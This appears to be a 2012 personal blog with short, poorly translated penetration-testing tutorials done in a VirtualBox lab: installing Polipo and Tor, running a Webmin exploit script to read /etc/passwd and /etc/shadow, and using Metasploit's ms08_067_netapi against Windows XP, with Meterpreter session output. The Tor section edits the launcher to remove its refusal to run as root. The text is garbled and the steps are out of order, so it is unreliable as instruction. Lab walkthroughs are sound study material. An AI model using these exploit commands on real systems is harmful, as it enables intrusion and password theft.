Kamis, 20 September 2012

How To Install Polipo on Linux


type the console command : root @ bt: ~ # apt-get install polipo

 

Then wait for the process is running until installation is completed sepertis screenshot above this.




Install is finished you get into webrowser then typing in its URL: localhost and port 8123

Selasa, 18 September 2012

Learn to Install Tor

1. if you don't have tor file, please download in [ here.]

   view download torproject.org
   and we choose is Tor Browser Bundle For Linux.

2. then extract the file first is you can torprojec.org.

    command : tar-xvf tor-browser-gnu-linux-i686-2.2.39-1-dev-en-US.tar.gz


3. is entered you into a root-browser_en tor-US /

command : cd tor-browser_en-US /

view see that there is the content of the tor-browser_en-US /

4. and editing is done on the contents of star doc-tor-browser

   command: kwrite star-tor-browser


5.editing dialogue in order to appear the last kwrite

did removal of existing boxed dialogue editing dialogue in order to Appear the last kwrite


removal of existing dialogue did dikotak
"The Tor Browser Bundle should not be ran as root Exiting."
exit "

and replace text using "TOR in started"


6. and the final stage perform the command. / start-tor-browser
    tor to run automatically on the browser you have.




  The above display is showing the ip address will change itself


Minggu, 16 September 2012

PRIVILEGE ESCALATION OS UBUNTU IN V-BOX

 1.First thing to do scanning <target ip> using Zenmap or can be done also using nmap.
    "example: I do a scan using nmap and Zenmap"

       scans were performed using <ip Target> 






 2.  Here we make use exploitDB existing exploits the application tools.
      and do exploits perform the command:. /
searchsploit  ssh linux remote.



  3. of  commad /searchsploit  ssh linux remote 
      I will do exploits. / searchsploit webmin  prior to proceeding to the next stage 


   in this case I use port 10000/tcp (webmin httpd), and after that I type
   example : "perl platforms/multiple/remote/2017.pl 192.168.43.130 10000 /etc/passwd 0"
   to know the user list or login code.


  4.
    and now type "perl platforms/multiple/remote/2017.pl 192.168.43.130 10000 /etc/shadow 0"to   know    the login password.

 
determines the contents of the files we need to extract the files terlwbih ago



Sabtu, 15 September 2012

EXPLOITATION SMB IN WINDOWS XP USING METASPLOIT



 and now we've been able to perform exploitaion against windows xp in virtual -box

 







msf  exploit(ms08_067_netapi) > exploit
 [*] Started reverse handler on 192.168.56.1:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1035) at 2012-09-15 03:09:55 +0700
 
msf  exploit(ms08_067_netapi) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
RHOST which we live setting. we can be when we do scaning using Zenmap on the first stage earlier. the ip addresses target.
 
my friends  here we can see a gap in the system-on RHOST (who was given a yellow sign) 











 The tnext step saw a gap that can be entered by using the :  command show options

set payload windows/shell_bind_tcp
 

 
example in the picture :


and the set is the first payload. set the payload and the data follow the show last payload.
regulator payload used by Linuxx86 platform to a target when the shell is mounted.


To put on the target shell to we should look at the payload of existing service data to be able to enter in its later. command : show Payload





then we will mengcek expoit that can be entered by using the command. show exploits.
of the command show exploits before you will take one of the data and try again - to be able to re-enter into the next stage.
I'm here trying to exploit the data: 

use exploit/window/smb/ms08_067_netapi

The first open metasploit on backtrack toolls that exist in and plilih msfconsole.
then do check using the command seacrh smb.
well here we will know all smb sought earlier.









Before we exploit, we need to find information about target. We can use zenmap After that we can use msfconsole and typing search smb.

"Introduction to Metasploit"
penetration metasploit framework is a tool which is powerful enough to perform penestrasi into a system.metasploit framework can also be regarded as a development platform to create and exploit security tool